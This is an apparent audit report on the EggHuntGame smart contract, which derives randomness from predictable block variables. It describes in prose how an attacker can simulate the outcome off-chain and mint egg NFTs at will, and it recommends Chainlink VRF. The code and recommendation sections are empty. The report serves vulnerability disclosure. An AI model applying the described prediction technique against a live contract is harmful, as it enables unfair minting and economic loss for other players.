Eggstravaganza

Summary

The EggHuntGame contract uses an insecure pseudo-random number generator to determine egg discovery, relying on predictable blockchain variables (block.timestamp, block.prevrandao, msg.sender, eggCounter). This allows attackers to manipulate or predict the outcome, guaranteeing egg finds and NFT mints. The flaw undermines the game’s fairness and could lead to excessive NFT issuance, devaluing the project. A secure randomness solution, such as Chainlink VRF, is recommended to fix this high-severity issue.

Vulnerability Details

Code Affected

Description

The contract generates a pseudo-random number (random) using keccak256 with inputs from:

• block.timestamp: Miners can adjust slightly (e.g., within seconds).

• block.prevrandao: Known after the previous block is mined.

• msg.sender: Controlled by the caller.

• eggCounter: Publicly readable state variable.

These inputs are transparent and manipulable, making random predictable. Attackers can:

• Simulate random off-chain using current blockchain state.

• Submit transactions only when random < eggFindThreshold, ensuring success.

• Miners can tweak block.timestamp to favor themselves.

This breaks the intended probabilistic egg-finding mechanic (e.g., a 50% chance if eggFindThreshold = 50), allowing attackers to mint NFTs at will.

Exploit Example

An attacker contract:

• Steps: Call attack() repeatedly, only executing when random favors the attacker.

Impact

• Fairness Compromised: Attackers can find eggs with near-100% success, leaving honest players at a disadvantage.

• NFT Over-Minting: Uncontrolled minting could exhaust an NFT supply cap or flood the market, devaluing Egg NFTs.

• Economic Loss: If rewards or fees are tied to minting, attackers could drain contract resources.

• Trust Erosion: Players may abandon the game if its core mechanic is exploitable, damaging the project’s reputation.

Tools Used

No specific tools were employed to identify this vulnerability.

Recommendations